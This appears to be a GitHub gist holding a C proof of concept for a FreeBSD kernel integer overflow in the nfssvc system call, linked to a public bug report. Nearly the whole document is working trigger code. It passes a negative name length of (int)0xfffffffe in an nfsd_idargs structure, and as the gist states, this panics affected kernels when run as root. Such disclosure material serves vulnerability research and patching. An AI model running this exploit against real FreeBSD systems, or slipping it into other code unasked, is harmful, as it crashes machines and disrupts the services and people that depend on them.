@CTurt
Last active April 13, 2016 19:08
FreeBSD nfssvc system call integer overflow
/*
PoC for FreeBSD kernel integer overflow in nfssvc system call
Refer to bug report here: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206626
The system call is only accessible as root.
Running this test will panic affected versions of FreeBSD.
clang nfssvc.c -o n
su
./n
- CTurt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfsserver/nfs.h>
#include <unistd.h>
/* Value for nfsd_idargs.nid_flag: request initialization of the id-name cache. */
#define NFSID_INITIALIZE 0x0001
/* nfssvc(2) request flags passed as the first argument below. */
#define NFSSVC_IDNAME 0x00000200      /* select the id/name operation */
#define NFSSVC_NEWSTRUCT 0x20000000   /* use the nfsd_idargs argument layout */
/*
 * Argument structure for the NFSSVC_IDNAME | NFSSVC_NEWSTRUCT call.
 * Defined locally so the program does not depend on the header exporting it;
 * the field order and types must match the kernel's definition, since the
 * kernel copies this structure in from user space.  The PoC only sets
 * nid_flag, nid_name and nid_namelen; nid_namelen is a signed int, which is
 * what makes the over-large length below turn negative.
 */
struct nfsd_idargs {
	int nid_flag;        /* Flags (see NFSID_* above) */
	uid_t nid_uid;       /* user/group id */
	gid_t nid_gid;
	int nid_usermax;     /* Upper bound on user name cache */
	int nid_usertimeout; /* User name timeout (minutes) */
	u_char *nid_name;    /* Name buffer (user-space pointer) */
	int nid_namelen;     /* and its length, as a signed int */
	gid_t *nid_grps;     /* group list */
	int nid_ngroup;      /* Size of groups list */
};
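/*
 * Trigger the nfssvc(2) length handling bug from the linked report.
 *
 * The unsigned constant 0xfffffffe does not fit in the int nid_namelen
 * field, so the assignment stores a negative value (implementation-defined
 * conversion; -2 on two's-complement targets).  According to the report the
 * kernel uses that length without an adequate range check, which is the
 * integer overflow the bug tracks; a defensive kernel rejects negative or
 * oversized nid_namelen before copying anything.
 *
 * Returns 0 after the call (the kernel has usually panicked by then on
 * affected versions), 1 if the name buffer could not be allocated.
 */
int main(void) {
	u_char *overflow = malloc(0x4000);
	if (overflow == NULL) {
		/* Original code passed NULL straight into memset(); fail cleanly instead. */
		perror("malloc");
		return 1;
	}
	memset(overflow, 'a', 0x4000);

	/*
	 * Zero-initialize: the original left nid_uid, nid_gid, nid_usermax,
	 * nid_usertimeout, nid_grps and nid_ngroup uninitialized, so whatever
	 * the kernel does with them was non-deterministic.
	 */
	struct nfsd_idargs nid = {0};
	nid.nid_flag = NFSID_INITIALIZE;
	nid.nid_name = overflow;
	/* Explicit cast documents that the negative value is intended. */
	nid.nid_namelen = (int)0xfffffffe;

	printf("Triggering...\n");
	int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
	/* Capture errno before printf(), which may overwrite it. */
	int saved_errno = errno;
	printf("Result: %d\n", result);
	printf("Errno: %d\n", saved_errno);

	free(overflow);
	return 0;
}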